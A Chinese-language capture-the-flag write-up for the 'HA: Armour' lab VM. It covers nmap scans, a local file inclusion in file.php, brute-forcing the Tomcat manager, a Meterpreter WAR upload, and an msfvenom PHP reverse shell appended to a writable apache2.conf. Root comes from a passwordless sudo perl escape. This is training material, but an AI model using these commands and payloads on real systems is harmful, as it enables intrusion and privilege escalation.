HA: Armour-Write-up



下载地址:点我

bilibili:点我

信息收集

  • nmap扫存活找到IP为:192.168.116.140
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
| 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_ 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~
  • 开放80,8009,8080端口,都是Web服务分别是Apache httpd,Apache Jserv和Apache Tomcat,还有一个65534端口为ssh服务。

  • 指定端口连接ssh,得到第一个flag:HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA},和提示:TheOlympics

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜  ~ ssh 192.168.116.140 -p65534      
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.


db 88888888ba 88b d88 ,ad8888ba, 88 88 88888888ba
d88b 88 "8b 888b d888 d8"' `"8b 88 88 88 "8b
d8'`8b 88 ,8P 88`8b d8'88 d8' `8b 88 88 88 ,8P
d8' `8b 88aaaaaa8P' 88 `8b d8' 88 88 88 88 88 88aaaaaa8P'
d8YaaaaY8b 88""""88' 88 `8b d8' 88 88 88 88 88 88""""88'
d8""""""""8b 88 `8b 88 `8b d8' 88 Y8, ,8P 88 88 88 `8b
d8' `8b 88 `8b 88 `888' 88 Y8a. .a8P Y8a. .a8P 88 `8b
d8' `8b 88 `8b 88 `8' 88 `"Y8888Y"' `"Y8888Y"' 88 `8b


www.hackingarticles.in

HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}

Hint 1: TheOlympics

[email protected]'s password:
  • 浏览器访问80端口,F12发现注释里有armour,notes.txt,还有69,开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话,可以猜出来是TFTP(小型文件传输协议)的端口,详细TCP/UDP端口列表
  • 可以使用nmap加UDP协议判断69端口是否开放。
1
2
3
4
5
6
7
8
9
10
11
➜  ~ sudo  nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).

PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
  • 因为要发送UDP报文,所以要加sudo以Root权限执行。发现目标有开放69端口。
  • TFTP客户端连上服务端下载notes.txt文件,得到第二个flag。
1
2
3
4
5
6
7
8
9
➜  ~ atftp                
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}

Hint 2: maybeevena
➜ ~
  • 还有一个提示maybeevena,不知道什么鬼。先爆破80端口的php后缀文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜  ~ dirb http://192.168.116.140 -X .php

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0)

-----------------
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~
  • 找到file.php,打开页面一片空白,fuzz参数。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd' 
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************

Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000000033: 200 28 L 36 W 1437 Ch "file"

Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036

➜ ~
  • 找到参数为file,还是一个文件读取漏洞,因为是Apache的服务,所以先想到读取Apache相关的文件,敏感的文件有.htpasswd,一般在/etc/apache2/.htpasswd
1
2
3
4
5
6
➜  ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd                      
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}


Hint 3: StarBucks
➜ ~
  • 找到第三个flag,和第三个提示:StarBucks。
  • 官方提示:

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

  • 三个提示拼起来就是:TheOlympics maybeevena starBucks,强行当密码。

tomcat 获取会话

  • 浏览器打开8080端口,发现是一个Tomcat的管理页面,密码已经知道,现在来爆破用户名。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt 
CeWL 5.4.6 (Exclusion) Robin Wood ([email protected]) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:


Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗
  • 使用CeWL爬80端口的网页生成用户名的字典,使用MSF对Tomcat进行登录密码枚举。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) >
  • 不知道为什么,我重启服务器后才枚举出来,用户名是:armour。
  • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
  • Tomcat上传木马有很多方法,可以手工上传WAR文件部署。
  • 这里就使用MSF比较省时间。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword                                                                                                                                                                                  
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800

meterpreter >
  • 枚举本地开发端口
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > shell 
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java
  • 这里发现目标主机上监听着8081端口,只能在目标本地进行访问,所以我们可以把端口转发出来,MSF里有自带的。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
  • 现在访问自己的8081端口就可以拿到第四个flag。
1
2
➜  ~ curl http://127.0.0.1:8081                                        
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
  • 或者直接在目标主机访问
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[email protected]:~$ cd /tmp
cd /tmp
[email protected]:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’

index.html 100%[===================>] 56 --.-KB/s in 0s

2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]

[email protected]:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
[email protected]:/tmp$

权限提升

  • 查找GUID文件
1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
[email protected]:/$
  • 查找SUID文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[email protected]ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
[email protected]ubuntu:/$
[email protected]ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
[email protected]ubuntu:/$
  • 查找可写目录,发现有/var/www/html
1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
  • 查找root用户权限可写文件
1
2
3
4
5
6
7
8
9
10
[email protected]:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
[email protected]:/$
  • 找到/etc/apache2/apache2.conf/opt/tomcat/conf/tomcat-users.xml文件可写。
  • /opt/tomcat/conf/tomcat-users.xml只有之前的账号密码,只能看/etc/apache2/apache2.conf文件了。

  • 查找passwd文件,每行记录又被冒号(:)分隔为7个字段分别对应:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell

  • group文件对应:组名:口令:组标识号:组内用户列表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
[email protected]:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
[email protected]:/$


[email protected]:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
[email protected]:~$
  • 找到一个普通用户aarti和armour
  • 把Apache配置文件下载到自己的电脑,Apache默认以www-data用户启动的
1
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
  • 修改用户和组,让Apache以上面那个普通用户启动,为什么不能以Root用户启动能?因为不重新编译是不能用Root权限的,这样Web服务也起不来。所以只能改aarti的

  • 覆盖Apache配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[email protected]:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’

apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s

utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]

[email protected]:/etc/apache2$ cat apache2.conf
  • 写入后到80端口服务下的目录写木马。(这是官方出题人写的),我试了不对,创建文件的用户为Tomcat,aarti用户读不了这个文件,所以是访问不了的,服务端报500错误。
  • 后来我利用文件包含Apache的配置文件获取到了会话。
  • 就是把Shell写进Apache2.conf,再利用上面发现的文件包含漏洞。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.conf

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800

meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/html$ whoami
whoami
aarti
[email protected]:/var/www/html$

提Root权限

  • 列举无密码sudo,发现有一个perl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
[email protected]:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
[email protected]:/var/www/html$
[email protected]:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
[email protected]:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/var/www/html#
[email protected]:~# ls
ls
final.txt
[email protected]:~# cat final.txt
cat final.txt

______ ______ _____ _ _ ______
/\ (_____ \ | ___ \ / ___ \ | | | |(_____ \
/ \ _____) )| | _ | || | | || | | | _____) )
/ /\ \ (_____ ( | || || || | | || | | |(_____ (
| |__| | | || || || || |___| || |___| | | |
|______| |_||_||_||_| \_____/ \______| |_|


IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}


!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/

AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
[email protected]:~#